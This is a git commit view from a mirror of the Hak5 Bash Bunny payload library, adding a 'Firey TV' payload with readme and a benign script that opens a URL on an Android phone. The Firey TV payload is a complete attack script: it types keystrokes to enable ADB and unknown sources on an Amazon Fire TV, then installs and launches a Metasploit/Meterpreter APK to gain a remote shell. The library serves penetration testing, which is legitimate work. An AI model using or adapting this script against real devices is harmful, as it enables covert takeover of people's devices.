mirror of
https://github.com/hak5/bashbunny-payloads.git
synced 2025-10-29 16:58:25 +00:00
Cleanup: Sort payloads by category
This commit is contained in:
75
payloads/library/android/fireytv/payload.txt
Normal file
75
payloads/library/android/fireytv/payload.txt
Normal file
@@ -0,0 +1,75 @@
|
||||
# Title: Firey TV
|
||||
# Author: DemmSec
|
||||
# Version: 1.0
|
||||
#
|
||||
# Enables ADB and unknown sources on a target FireTV
|
||||
# Then pushes a payload APK via ADB
|
||||
#
|
||||
# Requires android-tools-adb installed on the Bash Bunny
|
||||
#
|
||||
# Purple ............Running HID emulation, enabling ADB and unknown sources
|
||||
# Blue Blinking ...............Running ADB command to push payload.apk
|
||||
# Red Blinking.......FireTV failed to get an IP address from the Bash Bunny
|
||||
# Green..............Finished
|
||||
ATTACKMODE HID
|
||||
LED R B 0
|
||||
Q RIGHTARROW
|
||||
Q DELAY 200
|
||||
Q RIGHTARROW
|
||||
Q DELAY 200
|
||||
Q RIGHTARROW
|
||||
Q DELAY 200
|
||||
Q RIGHTARROW
|
||||
Q DELAY 200
|
||||
Q RIGHTARROW
|
||||
Q DELAY 200
|
||||
Q DOWNARROW
|
||||
Q DELAY 200
|
||||
Q RIGHTARROW
|
||||
Q DELAY 200
|
||||
Q RIGHTARROW
|
||||
Q DELAY 200
|
||||
Q RIGHTARROW
|
||||
Q DELAY 200
|
||||
Q RIGHTARROW
|
||||
Q DELAY 200
|
||||
Q RIGHTARROW
|
||||
Q DELAY 200
|
||||
Q RIGHTARROW
|
||||
Q DELAY 500
|
||||
Q ENTER
|
||||
Q DELAY 500
|
||||
Q DOWNARROW
|
||||
Q DELAY 800
|
||||
Q ENTER
|
||||
Q DELAY 800
|
||||
Q ENTER
|
||||
Q DELAY 500
|
||||
Q DOWNARROW
|
||||
Q DELAY 500
|
||||
Q DOWNARROW
|
||||
Q DELAY 500
|
||||
Q ENTER
|
||||
Q DELAY 200
|
||||
Q ENTER
|
||||
Q DELAY 200
|
||||
Q ESCAPE
|
||||
Q DELAY 200
|
||||
Q ESCAPE
|
||||
Q DELAY 200
|
||||
Q ESCAPE
|
||||
Q DELAY 200
|
||||
Q ESCAPE
|
||||
Q DELAY 200
|
||||
Q ESCAPE
|
||||
ATTACKMODE ECM_ETHERNET
|
||||
LED B 2000
|
||||
source bunny_helpers.sh
|
||||
if [ -z "${TARGET_IP}" ]; then
|
||||
LED R 2000
|
||||
exit 1
|
||||
fi
|
||||
adb connect ${TARGET_IP}
|
||||
adb install /root/udisk/payloads/${SWITCH_POSITION}/payload.apk
|
||||
adb shell "am start --user 0 -a android.intent.action.MAIN -n com.metasploit.stage/.MainActivity"
|
||||
LED G
|
||||
28
payloads/library/android/fireytv/readme.md
Normal file
28
payloads/library/android/fireytv/readme.md
Normal file
@@ -0,0 +1,28 @@
|
||||
# Meterpreter shell on an Amazon Fire TV
|
||||
|
||||
* Author: DemmSec
|
||||
* Version: Version 1.0
|
||||
* Target: Amazon FireTV (Latest Firmware/Version)
|
||||
|
||||
|
||||
## Description
|
||||
|
||||
Enables ADB and Unknown sources via keyboard input on the target Fire TV, then uses ADB to go ahead and install payload.apk from the switch directory and then execute it.
|
||||
|
||||
## Requirements
|
||||
|
||||
Requires: android-tools-adb
|
||||
To install this simply share your internet connection with the Bash Bunny. SSH into it and run: apt-get install android-tools-adb
|
||||
|
||||
## Configuration
|
||||
|
||||
Create a payload APK file and place it in the same directory as payload.txt, plug in and wait.
|
||||
|
||||
## STATUS
|
||||
|
||||
| LED | Status |
|
||||
| ------------------ | -------------------------------------------- |
|
||||
| Purple | Running keyboard emulation |
|
||||
| Blue Blinking | Running ADB to push payload to Fire TV |
|
||||
| Red Blinking | Fire TV failed to get an IP address |
|
||||
| Green | Finished |
|
||||
22
payloads/library/android/open_url/README.md
Normal file
22
payloads/library/android/open_url/README.md
Normal file
@@ -0,0 +1,22 @@
|
||||
# android_open_url for Bash Bunnys
|
||||
|
||||
* Author: bg-wa
|
||||
* Version: Version 1.0
|
||||
* Target: Android 4.2.2
|
||||
|
||||
## Description
|
||||
|
||||
Opens the browser to a specified url on an unlocked android phone.
|
||||
|
||||
## Configuration
|
||||
|
||||
**By default this script will open https://www.hak5.org**
|
||||
|
||||
Set the URL param as desired.
|
||||
|
||||
## STATUS
|
||||
|
||||
| LED | Status |
|
||||
| ------------------ | -------------------------------------------- |
|
||||
| Green | Working |
|
||||
| Red | Finished |
|
||||
32
payloads/library/android/open_url/payload.txt
Normal file
32
payloads/library/android/open_url/payload.txt
Normal file
@@ -0,0 +1,32 @@
|
||||
#!/bin/bash
|
||||
#
|
||||
# Title: Android Open Url (unlocked)
|
||||
# Author: bg-wa
|
||||
# Version: 1.0
|
||||
# Target: Android (4.2.2)
|
||||
# Props: Hak5
|
||||
#
|
||||
# Opens the browser to a specified url on an unlocked android phone.
|
||||
#
|
||||
|
||||
LED G
|
||||
|
||||
#+++ USER CONFIG +++
|
||||
|
||||
URL="https://www.hak5.org/"
|
||||
|
||||
#+++ END USER CONFIG +++
|
||||
|
||||
ATTACKMODE HID
|
||||
|
||||
Q GUI b
|
||||
Q DELAY 500
|
||||
Q ENTER
|
||||
Q DELAY 1000
|
||||
Q CTRL l
|
||||
Q DELAY 100
|
||||
Q STRING "${URL}"
|
||||
Q DELAY 100
|
||||
Q ENTER
|
||||
|
||||
LED R
|
||||
Reference in New Issue
Block a user